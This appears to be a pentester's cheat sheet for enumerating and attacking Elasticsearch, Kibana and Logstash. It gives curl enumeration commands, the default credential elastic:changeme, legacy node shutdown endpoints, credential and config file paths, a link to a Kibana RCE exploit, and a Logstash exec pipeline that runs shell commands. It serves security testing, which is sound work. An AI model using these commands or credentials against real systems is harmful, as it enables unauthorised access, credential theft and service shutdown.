WITHOUT CREDS
curl -X GET "ELASTICSEARCH-SERVER:9200/"
curl -X GET "ELASTICSEARCH-SERVER:9200/_xpack/security/user"   (pre-7.x path; newer versions use /_security/user)

Default built-in users (elastic:changeme is the historic default credential):
  elastic:changeme
  kibana_system
  logstash_system
  beats_system
  apm_system
  remote_monitoring_user

Read-only status endpoints:
  /_cluster/health
  /_cat/indices
  /_cat/health

Node shutdown endpoints (legacy API, removed in Elasticsearch 2.0):
  /_shutdown
  /_cluster/nodes/_master/_shutdown
  /_cluster/nodes/_shutdown
  /_cluster/nodes/_all/_shutdown
WITH CREDS
curl -H "Authorization: ApiKey <base64-encoded-api-key>" "ELASTICSEARCH-SERVER:9200/"
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user/<username>"
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user"
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/role"
INTERNAL CONFIG FILES
Elasticsearch configuration: /etc/elasticsearch/elasticsearch.yml
Kibana configuration:        /etc/kibana/kibana.yml
Logstash configuration:      /etc/logstash/logstash.yml
Filebeat configuration:      /etc/filebeat/filebeat.yml
Users file:                  /etc/elasticsearch/users_roles
Kibana version < 6.6.0 = RCE (CVE-2019-7609, https://github.com/LandGrey/CVE-2019-7609/)
LOGSTASH BASIC
Minimal pipeline config: the exec input runs a shell command every 120 seconds and the file output writes each event to /tmp/output.log.

input {
  exec {
    command  => "whoami"
    interval => 120
  }
}

output {
  file {
    path  => "/tmp/output.log"
    codec => rubydebug
  }
}